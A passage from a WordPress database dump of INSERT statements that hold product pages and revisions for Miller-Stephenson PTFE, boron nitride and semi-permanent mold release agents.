formulated ready-to-use, making dilution equipment redundant. Overall, our mold release agents represent an added-value proposition that can be tailored to many types of molding applications. Miller-Stephenson has spent years improving and tailoring our mold release agents to deliver the highest value proposition by increase efficiency, reducing over-application, and enhancing finished part quality and consistency.\r\n<p style="font-variant-ligatures: normal; font-variant-caps: normal; orphans: 2; text-align: start; widows: 2; -webkit-text-stroke-width: 0px; word-spacing: 0px;"><a href="https://www.miller-stephenson.com/mold-release-application-guide/">For help with application or troubleshooting concerns while using ReleaSys.</a></p>\r\n<a href="https://www.miller-stephenson.com/mold-release-agents/">If you would like more information on which mold release agent is right for you click here</a>', 'ReleaSys™ 8200 | PTFE Water-based Release Agents', 'ReleaSys™ 8200 is a water-based, semi-permanent dry film release agents designed to provide reliable, consistent release across a broad range of moldable substrates. Excels at compression and transfer molding.  Properly applied, our product develops a durable, thin-film on the mold surface with minimal mold build-up.  ReleaSys 8200 will not interfere with post-production finishing operation. Benefits of this product include:\r\n<ul>\r\n 	<li>High durability; Surface activation chemistry</li>\r\n 	<li>Ideal for Silicone-based molding</li>\r\n 	<li>Ideal for Rubber to Metal Bonding</li>\r\n 	<li>Thermally Stable (&gt;550°F)</li>\r\n 	<li>Clean, Non-oily, Non-migrating</li>\r\n</ul>', 'publish', 'closed', 'closed', '', 'ptfe-water-based-release-agents', '', '', '2017-06-16 17:01:03', '2017-06-16 17:01:03', '', 0, 'https://132.148.10.86/wordpress/?post_type=product&#038;p=297', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (298, 3, '2016-08-17 16:42:35', '2016-08-17 16:42:35', '', 'PTFE Water-based Release Agents', '', 'inherit', 'open', 'closed', '', 'windmill-releasys-82', '', '', '2016-11-23 13:42:09', '2016-11-23 13:42:09', '', 297, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/Windmill-ReleaSys-82.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (299, 3, '2017-06-16 17:00:57', '2017-06-16 17:00:57', '<h2>ReleaSys™ 8200 | PTFE Water-based Release Agents</h2>\r\n<h3>Advanced Fluoropolymer Chemistry; Dry-Film Technology, Reliable, consistent performance</h3>\r\nReleaSys™ 8200 is a PTFE Water-based Release Agents, that offers semi-permanent productive which generated a uniform dry film on the mold surface. These PTFE Water-based Release Agents are designed to provide reliable, consistent release across a broad range of moldable substrates. Excels at compression and transfer molding.  Properly applied, our product develops a durable, thin-film on the mold surface with minimal mold build-up.  ReleaSys 8200 will not interfere with post-production finishing operation. Benefits of this product include:\r\n<ul>\r\n 	<li>High durability; Surface activation chemistry</li>\r\n 	<li>Ideal for Silicone-based molding</li>\r\n 	<li>Ideal for Rubber to Metal Bonding</li>\r\n 	<li>Thermally Stable (&gt;550°F)</li>\r\n 	<li>Clean, Non-oily, Non-migrating</li>\r\n</ul>\r\nSemi-permanent release agents are state-of-the-art release systems that provide the molding industry with an alternative to the traditional high volume, apply-every-cycle release agent. Miller-Stephenson has developed the ReleaSys product line in an effort to offer a high efficiency, cost-effective, and technologically advanced release agent to our customers. Our semi-permanent release agents forms a chemical bond to the mold surface which results in exceptional surface adhesion, durability, and application efficiency. All variants of the ReleaSys Series will deliver higher productivity, lower rejection rates, and higher quality products even in the most demanding applications. We offer various slip-levels and have specialized formulations for differing polymer types and molding processes ( ie: injection, transfer, compression). Miller-Stephenson has developed ReleaSys formulations to be applicable in virtually all types of composites, elastomers and organic polymers.\r\n<h3>PTFE Water-based Release Agents - Application Efficiency; Highly Cost-Effective</h3>\r\nThe application efficiency of ReleaSys can be seen by the relatively small amounts of PTFE Water-based Release Agents that needs to be applied to the mold surface to give numerous releases.  This small volume needed means that storage space is reduced and cost per application is minimized. Products are formulated ready-to-use, making dilution equipment redundant. Overall, our mold release agents represent an added-value proposition that can be tailored to many types of molding applications. Miller-Stephenson has spent years improving and tailoring our mold release agents to deliver the highest value proposition by increase efficiency, reducing over-application, and enhancing finished part quality and consistency.\r\n<p style="font-variant-ligatures: normal; font-variant-caps: normal; orphans: 2; text-align: start; widows: 2; -webkit-text-stroke-width: 0px; word-spacing: 0px;"><a href="https://www.miller-stephenson.com/mold-release-application-guide/">For help with application or troubleshooting concerns while using ReleaSys.</a></p>\r\n<a href="https://www.miller-stephenson.com/mold-release-agents/">If you would like more information on which mold release agent is right for you click here</a>', 'ReleaSys™ 8200 | PTFE Water-based Release Agents', 'ReleaSys™ 8200 is a water-based, semi-permanent dry film release agents designed to provide reliable, consistent release across a broad range of moldable substrates. Excels at compression and transfer molding.  Properly applied, our product develops a durable, thin-film on the mold surface with minimal mold build-up.  ReleaSys 8200 will not interfere with post-production finishing operation. Benefits of this product include:\r\n<ul>\r\n 	<li>High durability; Surface activation chemistry</li>\r\n 	<li>Ideal for Silicone-based molding</li>\r\n 	<li>Ideal for Rubber to Metal Bonding</li>\r\n 	<li>Thermally Stable (&gt;550°F)</li>\r\n 	<li>Clean, Non-oily, Non-migrating</li>\r\n</ul>', 'inherit', 'closed', 'closed', '', '297-autosave-v1', '', '', '2017-06-16 17:00:57', '2017-06-16 17:00:57', '', 297, 'https://132.148.10.86/wordpress/297-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (300, 3, '2017-05-30 16:41:39', '2017-05-30 16:41:39', '<h2>Rubber Molding Release Agent; Water-based</h2>\n<h3>Superior surface adhesion &amp; durability; Sop</h3>\nReleaSys 8500 is a highly versatile water-based, semi-permanent <span style="text-decoration: underline;"><strong>rubber molding release agent</strong></span> designed to exhibit superior durability, surface adhesion, and minimization of slip-stick.  Properly applied, our product develops a long lasting thin-film on the mold surface with minimal mold build-up.  ReleaSys 8500 will not interfere with post-production finishing operation.  Benefits of this product include:\n<ul>\n 	<li>Exceptional release agent durability</li>\n 	<li>Ideal for lower complexity molds</li>\n 	<li>Medium Slip; No transfer</li>\n 	<li>Minimizes mold build-up and fouling</li>\n</ul>\n<span style="font-size: 11.0pt; font-family: \'Helvetica\',sans-serif; color: #555555;">ReleaSys 8500 and ReleaSys 85 products are recommended for releasing all natural and synthetic rubber compounds including silicone. Miller-Stephenson rubber molding release agent products chemically bond to mold surfaces ensuring the highest number of releases per application with minimal transfer and no mold fouling. And the semi-permanent Frekote release coatings eliminate rubber to metal bonding failures. The result? Lower scrap reduction rates of 20% or more over other products.Semi-permanent release agents are state-of-the-art release systems that provide the molding industry with an alternative to the traditional high volume, apply-every-cycle release agent. </span>\n\n<span style="font-size: 11.0pt; font-family: \'Helvetica\',sans-serif; color: #555555;">Miller-Stephenson has developed the ReleaSys product line in an effort to offer a high efficiency, cost-effective, and technologically advanced release agent to our customers. Our semi-permanent release agents forms a chemical bond to the mold surface which results in exceptional surface adhesion, durability, and application efficiency. All variants of the ReleaSys Series will deliver higher productivity, lower rejection rates, and higher quality products even in the most demanding applications. We offer various slip-levels and have specialized formulations for differing polymer types and molding processes ( ie: injection, transfer, compression). Miller-Stephenson has developed ReleaSys formulations to be applicable in virtually all types of composites, elastomers and organic polymers.</span>\n<p style="font-variant-ligatures: normal; font-variant-caps: normal; orphans: 2; text-align: start; widows: 2; -webkit-text-stroke-width: 0px; word-spacing: 0px;">The application efficiency of ReleaSys can be seen by the relatively small amounts of rubber molding release agent that needs to be applied to the mold surface to give numerous releases.  This small volume needed means that storage space is reduced and cost per application is minimized. Products are formulated ready-to-use, making dilution equipment redundant. Overall, our mold release agents represent an added-value proposition that can be tailored to many types of molding applications. Miller-Stephenson has spent years improving and tailoring our mold release agents to deliver the highest value proposition by increase efficiency, reducing over-application, and enhancing finished part quality and consistency.</p>\n<p style="font-variant-ligatures: normal; font-variant-caps: normal; orphans: 2; text-align: start; widows: 2; -webkit-text-stroke-width: 0px; word-spacing: 0px;"><a href="https://www.miller-stephenson.com/mold-release-application-guide/">For help with application or troubleshooting concerns while using ReleaSys.</a></p>\n<a href="https://www.miller-stephenson.com/mold-release-agents/">If you would like more information on which mold release agent is right for you click here</a>', 'ReleaSys 8500', 'ReleaSys 8500 is a highly versatile water-based, semi-permanent rubber molding release agent designed to exhibit superior durability, surface adhesion, and minimization of slip-stick.  Properly applied, our product develops a long lasting thin-film on the mold surface with minimal mold build-up.  ReleaSys 8500 will not interfere with post-production finishing operation.  Benefits of this product include:\n<ul>\n 	<li>Optimized for Rubber/Elastomer molding</li>\n 	<li>Ideal for lower complexity molds</li>\n 	<li>Medium Slip; No transfer</li>\n 	<li>Minimizes mold build-up and fouling</li>\n</ul>', 'inherit', 'closed', 'closed', '', '293-autosave-v1', '', '', '2017-05-30 16:41:39', '2017-05-30 16:41:39', '', 293, 'https://132.148.10.86/wordpress/293-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (301, 3, '2017-06-05 12:19:52', '2017-06-05 12:19:52', '<h2>MS-122AV | PTFE release agent</h2>\n<h3>Superior Surface Adhesion; Extended Reapplication Intervals; High Durability</h3>\nMS-122AV combines high-efficiency low-molecular weight polytetrafluoroethylene (PTFE) and proprietary surface activation chemistry.  This PTFE release agent yields superior adhesion of PTFE to metallic, glass, and non-plastic surfaces. The result is unmatched durability, extended reapplication intervals and virtually no transfer. MS-122AV is ideal for composite molding and for a users most difficult molding operations  MS-122AV advantages include:\n<ul>\n 	<li>Unparalleled release agent durability</li>\n 	<li>Ideal for difficult mold geometries</li>\n 	<li>Improves quality and consistency of molded parts</li>\n 	<li>Nonflammable; Non-ozone depleting formulation</li>\n 	<li>Non-migrating; Non-staining</li>\n</ul>\nMiller-Stephenson has been developing PTFE release agents for over 40 years. We is a global leader in the development of value-adding specialty release agents. We offer an expansive portfolio of release agents tailor-made for many different<strong><a href="https://www.miller-stephenson.com/composite-mold-release-agents/"> industrial applications</a></strong>.  This class of release agent yields a uniform, dry film on the mold surface while also offering superior surface adhesion and durability.  PTFE mold release agents typically can last numerous molding cycles before re-application is necessary, and is ideal for compression and transfer molding operations.  One drawback is its relatively poor performance in injection molding, which requires surface slip that PTFE dry films cannot achieve. PTFE release agents are particular effective in potting and casting molding operations, specifically with electronic potting and casting as PTFE\'s chemical inertness and low-transfer will not interfere with the sensitive electronics.\n<h3>Why Chose MS-122AV | PTFE release agent</h3>\nProduction engineers will typically choose PTFE release agent if they are looking for a non-silicone, chemical inert, and non-transferable release agent that is applicable across a broad range of substrates. PTFE, on a release per application basis is significantly more efficient and cost-effective than sacrificial or PVA alternatives.  Miller-Stephenson’s MS-122AV is a formulation which increase the durability and cost-effectiveness even further by addition of proprietary surface activation chemistry.\n\nMiller-Stephenson offers a selection of specialized formulations which provide high performance solutions for your molding process.  All variants of the MS-122 Series will deliver higher productivity, lower rejection rates, and higher quality products.  Please use the product selection guide below to help direct you to the appropriate product.\n\n<a href="https://www.miller-stephenson.com/mold-release-agents/">If you would like more information on which mold release agent is right for you click here</a>', 'MS-122AV | PTFE release agent', 'MS-122AV combines high-efficiency low-molecular weight polytetrafluoroethylene (PTFE) and proprietary surface activation chemistry.  This formulation yields superior adhesion of PTFE to metallic, glass, and non-plastic surfaces. The result is unmatched durability, extended reapplication intervals and virtually no transfer.   MS-122AV advantages include:\n<ul>\n 	<li>Unparalleled release agent durability</li>\n 	<li>Ideal for difficult mold geometries</li>\n 	<li>Improves quality and consistency of molded parts</li>\n 	<li>Nonflammable; Non-ozone depleting formulation</li>\n 	<li>Non-migrating; Non-staining</li>\n</ul>', 'inherit', 'closed', 'closed', '', '182-autosave-v1', '', '', '2017-06-05 12:19:52', '2017-06-05 12:19:52', '', 182, 'https://132.148.10.86/wordpress/182-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (302, 3, '2016-08-17 18:22:20', '2016-08-17 18:22:20', '<h2>MS-122SE | PTFE Mold Release Agent</h2>\r\n<h3>High-Performance PTFE; High Solvency Carrier Fluid; Exceptional Utility</h3>\r\nMS-122SE is a high performance, high solvency PTFE Mold Release Agent specifically designed for unsurpassed adhesion to mold surfaces and extended durability. The proprietary solvent blend ensures that proper wetting, leveling, and surface preparation occurs when applied yielding a durable, uniform thin-film.  MS-122SE offers the following benefits:\r\n<ul>\r\n 	<li>Superior adhesion to mold surfaces</li>\r\n 	<li>High Solvency/Rapid Evaporating Carrier Fluid</li>\r\n 	<li>Ideal for compression/injection molding</li>\r\n 	<li>Nonflammable; Non-ozone depleting formulation</li>\r\n 	<li>Non-migrating; Non-staining</li>\r\n</ul>\r\n<span style="font-size: 11.0pt; font-family: \'Helvetica\',sans-serif; color: #555555;">Miller-Stephenson has been developing PTFE release agents for over 40 years.  This class of release agent yields a uniform, dry film on the mold surface while also offering superior surface adhesion and durability.  PTFE mold release agents typically can last numerous molding cycles before re-application is necessary, and is ideal for compression and transfer molding operations.  One drawback is its relatively poor performance in injection molding, which requires surface slip that PTFE dry films cannot achieve. PTFE release agents are particular effective in potting and casting molding operations, specifically with electronic potting and casting as PTFE\'s chemical inertness and low-transfer will not interfere with the sensitive electronics. </span>\r\n<h3 style="font-variant-ligatures: normal; font-variant-caps: normal; orphans: 2; text-align: start; widows: 2; -webkit-text-stroke-width: 0px; word-spacing: 0px;">Why Choose MS-122SE | PTFE Mold Release Agent</h3>\r\n<p style="font-variant-ligatures: normal; font-variant-caps: normal; orphans: 2; text-align: start; widows: 2; -webkit-text-stroke-width: 0px; word-spacing: 0px;"><span style="font-size: 11.0pt; font-family: \'Helvetica\',sans-serif; color: #555555;">Production engineers will typically choose PTFE mold release agent if they are looking for a non-silicone, chemical inert, and non-transferable release agent that is applicable across a broad range of substrates. PTFE, on a release per application basis is significantly more efficient and cost-effective than sacrificial or PVA alternatives.  Miller-Stephenson’s MS-122AV and MS-122SE are formulations which increase the durability and cost-effectiveness even further by addition of proprietary surface activation chemistry. </span></p>\r\n<p style="font-variant-ligatures: normal; font-variant-caps: normal; orphans: 2; text-align: start; widows: 2; -webkit-text-stroke-width: 0px; word-spacing: 0px;"><span style="font-size: 11.0pt; font-family: \'Helvetica\',sans-serif; color: #555555;">Miller-Stephenson offers a selection of specialized formulations which provide high performance solutions for your molding process.  All variants of the MS-122 Series will deliver higher productivity, lower rejection rates, and higher quality products.  Please use the product selection guide below to help direct you to the appropriate product.</span></p>\r\n<a href="https://www.miller-stephenson.com/mold-release-agents/">If you would like more information on which mold release agent is right for you click here</a>', 'MS-122SE | PTFE Mold Release Agent', 'MS-122SE is a high performance, high solvency mold release agent utilizing PTFE fluoropolymers (polytetrafluoroethylene) specifically designed for unsurpassed adhesion to mold surfaces and extended durability. The proprietary solvent blend ensures that proper wetting, leveling, and surface preparation occurs when applied yielding a durable, uniform thin-film.  MS-122SE offers the following benefits:\r\n<ul>\r\n 	<li>Superior adhesion to mold surfaces</li>\r\n 	<li>High Solvency/Rapid Evaporating Carrier Fluid</li>\r\n 	<li>Ideal for compression/injection molding</li>\r\n 	<li>Nonflammable; Non-ozone depleting formulation</li>\r\n 	<li>Non-migrating; Non-staining</li>\r\n</ul>', 'publish', 'closed', 'closed', '', 'ptfe-mold-release-agent', '', '', '2017-06-05 12:29:35', '2017-06-05 12:29:35', '', 0, 'https://132.148.10.86/wordpress/?post_type=product&#038;p=302', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (303, 3, '2016-08-17 19:00:34', '2016-08-17 19:00:34', '<h2>MS-143TE | PTFE Mold Release Agents</h2>\r\n<h3>Superior Utility; Robust Release Agent Performance; Highly Cost-Effective</h3>\r\nMS-143TE was developed as an efficient, economical and universal release agent. This PTFE mold release agents is a nonflammable, non-ozone depleting release agent/dry lubricant, containing a suspension of low-molecular PTFE (polytetrafluoroethylene) fluoropolymers.  As a dry lubricant, MS-143TE minimizes “slip-stick” and is ideal for low speed, light load applications. MS-143TE offers the following benefits:\r\n<ul>\r\n 	<li>Enhanced release agent durability/adhesion</li>\r\n 	<li>Efficient and consistent release of molded parts</li>\r\n 	<li>Outstanding lubricity (low coefficient of friction)</li>\r\n 	<li>Nonflammable, Non-ozone depleting formulation</li>\r\n 	<li>Non-migrating; Non-staining</li>\r\n</ul>\r\nMiller-Stephenson has been developing PTFE release agents for over 40 years.  This class of release agent yields a uniform, dry film on the mold surface while also offering superior surface adhesion and durability.  PTFE mold release agents typically can last numerous molding cycles before re-application is necessary, and is ideal for compression and transfer molding operations.  One drawback is its relatively poor performance in injection molding, which requires surface slip that PTFE dry films cannot achieve. PTFE release agents are particular effective in potting and casting molding operations, specifically with electronic potting and casting as PTFE\'s chemical inertness and low-transfer will not interfere with the sensitive electronics.\r\n<h3>Why Choose MS-143TE | PTFE Mold Release Agents</h3>\r\nProduction engineers will typically choose PTFE release agent if they are looking for a non-silicone, chemical inert, and non-transferable release agent that is applicable across a broad range of substrates. PTFE, on a release per application basis is significantly more efficient and cost-effective than sacrificial or PVA alternatives.  Miller-Stephenson’s MS-122AV, MS-122SE, and MS-143TE are formulations which increase the durability and cost-effectiveness even further by addition of proprietary surface activation chemistry. Many can be considered universal release agent.\r\n\r\nMiller-Stephenson offers a selection of specialized formulations which provide high performance solutions for your molding process.  All variants of the MS-122 Series will deliver higher productivity, lower rejection rates, and higher quality products.  Please use the product selection guide below to help direct you to the appropriate product.\r\n\r\n<a href="https://www.miller-stephenson.com/mold-release-agents/">If you would like more information on which mold release agent is right for you click here</a>', 'MS-143TE | PTFE Mold Release Agents', 'MS-143TE was developed as an efficient, economical and universal release agent. This formulation is a nonflammable, non-ozone depleting release agent/dry lubricant, containing a suspension of low-molecular PTFE (polytetrafluoroethylene) fluoropolymers.  As a dry lubricant, MS-143TE minimizes “slip-stick” and is ideal for low speed, light load applications. MS-143TE offers the following benefits:\r\n<ul>\r\n 	<li>Enhanced release agent durability/adhesion</li>\r\n 	<li>Efficient and consistent release of molded parts</li>\r\n 	<li>Outstanding lubricity (low coefficient of friction)</li>\r\n 	<li>Nonflammable, Non-ozone depleting formulation</li>\r\n 	<li>Non-migrating; Non-staining</li>\r\n</ul>', 'publish', 'closed', 'closed', '', 'ptfe-mold-release-agents', '', '', '2017-06-05 12:31:45', '2017-06-05 12:31:45', '', 0, 'https://132.148.10.86/wordpress/?post_type=product&#038;p=303', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (305, 3, '2016-08-17 19:13:27', '2016-08-17 19:13:27', '<h2>MS-143AX | Universal PTFE Release Agent</h2>\r\n<h3>Broad Range of Applications; Proprietary Binder Agent; Extended Reapplication Intervals</h3>\r\nMS-143AX Universal PTFE Release Agent contains a proprietary surface activator that combined with PTFE results in superior initial release action with up to 5 times the number of release cycles on metal molds.  It is not recommended for use on rubber molds. MS-143AX Universal PTFE Release Agent is an excellent dry lubricants for rubber on steel application. Note: MS-143AX can only be applied by dip coating or wiping applications, it can not be sprayed.\r\n<ul>\r\n 	<li>Enhanced surface adhesion and durability to metallic molds</li>\r\n 	<li>Minimized initial release force</li>\r\n 	<li>Nonflammable; Chemically Inert</li>\r\n 	<li>Non-Migrating</li>\r\n 	<li>Low coefficient of friction</li>\r\n</ul>\r\nMiller-Stephenson has been developing PTFE release agents for over 40 years.  This class of release agent yields a uniform, dry film on the mold surface while also offering superior surface adhesion and durability.  PTFE mold release agents typically can last numerous molding cycles before re-application is necessary, and is ideal for compression and transfer molding operations.  One drawback is its relatively poor performance in injection molding, which requires surface slip that PTFE dry films cannot achieve. PTFE release agents are particular effective in potting and casting molding operations, specifically with electronic potting and casting as PTFE\'s chemical inertness and low-transfer will not interfere with the sensitive electronics.\r\n<h3>Why Choose MS-143AX | Universal PTFE Release Agent</h3>\r\nProduction engineers will typically choose PTFE release agent if they are looking for a non-silicone, chemical inert, and non-transferable release agent that is applicable across a broad range of substrates. PTFE, on a release per application basis is significantly more efficient and cost-effective than sacrificial or PVA alternatives.  Miller-Stephenson’s MS-122AV and MS-122SE are formulations which increase the durability and cost-effectiveness even further by addition of proprietary surface activation chemistry.\r\n\r\nMiller-Stephenson offers a selection of specialized formulations which provide high performance solutions for your molding process.  All variants of the MS-122 Series will deliver higher productivity, lower rejection rates, and higher quality products.  Please use the product selection guide below to help direct you to the appropriate product.\r\n<p style="font-variant-ligatures: normal; font-variant-caps: normal; orphans: 2; text-align: start; widows: 2; -webkit-text-stroke-width: 0px; word-spacing: 0px;"><a href="https://www.miller-stephenson.com/mold-release-agents/">If you would like more information on which mold release agent is right for you click here</a></p>', 'MS-143AX | Universal PTFE Release Agent', 'MS-143AX contains a proprietary surface activator that combined with PTFE results in superior initial release action with up to 5 times the number of release cycles on metal molds.  It is not recommended for use on rubber molds.  It is an excellent dry lubricants for rubber on steel application. Note: MS-143AX can only be applied by dip coating or wiping applications, it can not be sprayed.\r\n<ul>\r\n 	<li>Enhanced surface adhesion and durability to metallic molds</li>\r\n 	<li>Minimized initial release force</li>\r\n 	<li>Nonflammable; Chemically Inert</li>\r\n 	<li>Non-Migrating</li>\r\n 	<li>Low coefficient of friction</li>\r\n</ul>', 'publish', 'closed', 'closed', '', 'universal-ptfe-release-agent', '', '', '2017-06-05 12:42:41', '2017-06-05 12:42:41', '', 0, 'https://132.148.10.86/wordpress/?post_type=product&#038;p=305', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (306, 3, '2016-08-17 19:23:36', '2016-08-17 19:23:36', '<h2>MS-143XD | Dry Film Mold Release Agent</h2>\r\n<h3>Efficient, Consistent Release Properties; Fast-Drying; No VOC;</h3>\r\nMS-143XD is a versatile and robust dry film mold release agent / lubricant, which utilizes a rapidly drying, VOC exempt carrier solvent to enhance throughput and production efficiency. The formulation contains a high lubricity, low molecular weight PTFE fluoropolymer designed to not interfere with posting finishing operations.  MS-143XD offers the following benefits:\r\n<ul>\r\n 	<li>Efficient, consistent release of molded parts</li>\r\n 	<li>Outstanding lubricity and minimization of slip-stick</li>\r\n 	<li>VOC exempt formulation</li>\r\n 	<li>Nonflammable, Non-ozone depleting</li>\r\n 	<li>Non-migrating; Non-staining</li>\r\n</ul>\r\nMiller-Stephenson has been developing PTFE release agents for over 40 years.  This class of release agent yields a uniform, dry film on the mold surface while also offering superior surface adhesion and durability.  PTFE mold release agents typically can last numerous molding cycles before re-application is necessary, and is ideal for compression and transfer molding operations.  One drawback is its relatively poor performance in injection molding, which requires surface slip that PTFE dry films cannot achieve. PTFE release agents are particular effective in potting and casting molding operations, specifically with electronic potting and casting as PTFE\'s chemical inertness and low-transfer will not interfere with the sensitive electronics.\r\n\r\nProduction engineers will typically choose a PTFE Dry Film mold release agent if they are looking for a non-silicone, chemical inert, and non-transferable release agent that is applicable across a broad range of substrates. PTFE, on a release per application basis is significantly more efficient and cost-effective than sacrificial or PVA alternatives.  Miller-Stephenson’s MS-122AV and MS-122SE are formulations which increase the durability and cost-effectiveness even further by addition of proprietary surface activation chemistry.\r\n\r\nMiller-Stephenson offers a selection of specialized formulations which provide high performance solutions for your molding process.  All variants of the MS-122 Series will deliver higher productivity, lower rejection rates, and higher quality products.  Please use the product selection guide below to help direct you to the appropriate product.\r\n\r\n<a href="https://www.miller-stephenson.com/mold-release-agents/">If you would like more information on which mold release agent is right for you click here</a>', 'MS-143XD | Dry Film Mold Release Agent', 'MS-143XD is a versatile and robust release agent / dry lubricant, which utilizes a rapidly drying, VOC exempt carrier solvent to enhance throughput and production efficiency. The formulation contains a high lubricity, low molecular weight PTFE fluoropolymer designed to not interfere with posting finishing operations.  MS-143XD offers the following benefits:\r\n<ul>\r\n 	<li>Efficient, consistent release of molded parts</li>\r\n 	<li>Outstanding lubricity and minimization of slip-stick</li>\r\n 	<li>VOC exempt formulation</li>\r\n 	<li>Nonflammable, Non-ozone depleting</li>\r\n 	<li>Non-migrating; Non-staining</li>\r\n</ul>', 'publish', 'closed', 'closed', '', 'dry-film-mold-release-agent', '', '', '2017-06-05 12:35:55', '2017-06-05 12:35:55', '', 0, 'https://132.148.10.86/wordpress/?post_type=product&#038;p=306', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (308, 3, '2016-08-17 19:47:10', '2016-08-17 19:47:10', '<h2>MS-153 High Temperature Release Agent</h2>\r\n<h3>Optimized Chemistry for Release of High Temperature Substrates (600-1800°F)</h3>\r\nMiller-Stephenson has developed a non-flammable, boron nitride product for high temperature release agent and dry film applications.  The hexagonal boron nitride is a low micron particle size providing enhanced adhesion and film uniformity. This form of boron nitride is a white ceramic particle that has a low coefficient of friction, inherently lubricious and stable at elevated temperatures and in aggressive environments.\r\n\r\nThe inert and non-wetting nature of the boron nitride particles make it an excellent surface coating for molds used to produce castings of light metals such as magnesium and for coating surfaces in glass making operations. Boron Nitride mold release coatings are a relatively tough and abrasion-resistant coating that also provides excellent release with aluminium, magnesium, zinc and other nonferrous metals and alloys. This release agent is particularly ideal when working with the latest-high temperature resins, and is also an excellent release for die-casting of low melting point metals such as lead. Miller-Stephensons high temperature release agent is non-reactive and non-stick with glass, slags, fluxes and as a lubricant/non-stick agent, MS-153 is ideal for hot-pressing and glass forming. Benefits include:\r\n<ul>\r\n 	<li>Ideal for light metal and glass mold release</li>\r\n 	<li>Prevent sticking of die and molds</li>\r\n 	<li>Protects Surfaces like MAG/MIG welding nozzles</li>\r\n 	<li>Effective mold release up to 800 Celsius</li>\r\n 	<li>Non-wetting; Non-reactive</li>\r\n</ul>\r\n<a href="https://www.miller-stephenson.com/mold-release-agents/">For help with choosing which mold release is right for your application check out article section here</a>\r\n\r\n&nbsp;', 'MS-153 | High Temperature Release Agent', 'Miller-Stephenson has developed a non-flammable, boron nitride product for high temperature mold release and dry film applications.  The hexagonal boron nitride is a low micron particle size providing enhanced adhesion and film uniformity. This form of boron nitride is a white ceramic particle that has a low coefficient of friction, inherently lubricious and stable at elevated temperatures and in aggressive environments.The inert and non-wetting nature of the boron nitride particles make it an excellent surface coating for molds used to produce castings of light metals such as magnesium and for coating surfaces in glass making operations. Benefits include:\r\n<ul>\r\n 	<li>Ideal for light metal and glass mold release</li>\r\n 	<li>Prevent sticking of die and molds</li>\r\n 	<li>Protects Surfaces like MAG/MIG welding nozzles</li>\r\n 	<li>Effective mold release up to 800 Celsius</li>\r\n 	<li>Non-wetting; Non-reactive</li>\r\n</ul>', 'publish', 'open', 'closed', '', 'high-temperature-release-agent', '', '', '2017-05-31 12:14:33', '2017-05-31 12:14:33', '', 0, 'https://132.148.10.86/wordpress/?post_type=product&#038;p=308', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (309, 3, '2017-05-31 12:14:27', '2017-05-31 12:14:27', '<h2>MS-153 High Temperature Release Agent</h2>\n<h3>Optimized Chemistry for Release of High Temperature Substrates (600-1800°F)</h3>\nMiller-Stephenson has developed a non-flammable, boron nitride product for high temperature release agent and dry film applications.  The hexagonal boron nitride is a low micron particle size providing enhanced adhesion and film uniformity. This form of boron nitride is a white ceramic particle that has a low coefficient of friction, inherently lubricious and stable at elevated temperatures and in aggressive environments.\n\nThe inert and non-wetting nature of the boron nitride particles make it an excellent surface coating for molds used to produce castings of light metals such as magnesium and for coating surfaces in glass making operations. Boron Nitride mold release coatings are a relatively tough and abrasion-resistant coating that also provides excellent release with aluminium, magnesium, zinc and other nonferrous metals and alloys. This release agent is particularly ideal when working with the latest-high temperature resins, and is also an excellent release for die-casting of low melting point metals such as lead. Miller-Stephensons high temperature release agent is non-reactive and non-stick with glass, slags, fluxes and as a lubricant/non-stick agent, MS-153 is ideal for hot-pressing and glass forming. Benefits include:\n<ul>\n 	<li>Ideal for light metal and glass mold release</li>\n 	<li>Prevent sticking of die and molds</li>\n 	<li>Protects Surfaces like MAG/MIG welding nozzles</li>\n 	<li>Effective mold release up to 800 Celsius</li>\n 	<li>Non-wetting; Non-reactive</li>\n</ul>\n<a href="https://www.miller-stephenson.com/mold-release-agents/">For help with choosing which mold release is right for your application check out article section here</a>\n\n&nbsp;', 'MS-153 | High Temperature Release Agent', 'Miller-Stephenson has developed a non-flammable, boron nitride product for high temperature mold release and dry film applications.  The hexagonal boron nitride is a low micron particle size providing enhanced adhesion and film uniformity. This form of boron nitride is a white ceramic particle that has a low coefficient of friction, inherently lubricious and stable at elevated temperatures and in aggressive environments.The inert and non-wetting nature of the boron nitride particles make it an excellent surface coating for molds used to produce castings of light metals such as magnesium and for coating surfaces in glass making operations. Benefits include:\n<ul>\n 	<li>Ideal for light metal and glass mold release</li>\n 	<li>Prevent sticking of die and molds</li>\n 	<li>Protects Surfaces like MAG/MIG welding nozzles</li>\n 	<li>Effective mold release up to 800 Celsius</li>\n 	<li>Non-wetting; Non-reactive</li>\n</ul>', 'inherit', 'closed', 'closed', '', '308-autosave-v1', '', '', '2017-05-31 12:14:27', '2017-05-31 12:14:27', '', 308, 'https://132.148.10.86/wordpress/308-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (310, 3, '2016-08-17 19:54:16', '2016-08-17 19:54:16', '<h2>Urethane Mold Release Agent; Solvent-based</h2>\r\n<h3>Superior release ease; Maximize product quality and throughput; High durability and surface slip.</h3>\r\nReleaSys™ 8900 Urethane Mold Release Agent is a solvent-based, semi-permanent release agents designed to provide superior durability and high slip across a broad range of moldable substrates. This formulation is particularly effective on difficult molding application or abrasive substrates. Ideally suited a Composite and Urethane release agent  Properly applied, our product develops a durable, thin-film on the mold surface with minimal build-up.  ReleaSys 8900 will not interfere with post-production finishing operation. Benefits of this product include:\r\n<ul>\r\n 	<li>Exceptional durability and surface adhesion</li>\r\n 	<li>High Slip;Ideal for complex mold geometries</li>\r\n 	<li>Ideal for Composites and Urethanes</li>\r\n 	<li>Fast evaporation and cure time</li>\r\n 	<li>Minimal mold build up</li>\r\n</ul>\r\nSemi-permanent release agents are state-of-the-art release systems that provide the molding industry with an alternative to the traditional high volume, apply-every-cycle release agent. Miller-Stephenson has developed the ReleaSys product line in an effort to offer a high efficiency, cost-effective, and technologically advanced release agent to our customers. Our semi-permanent release agents forms a chemical bond to the 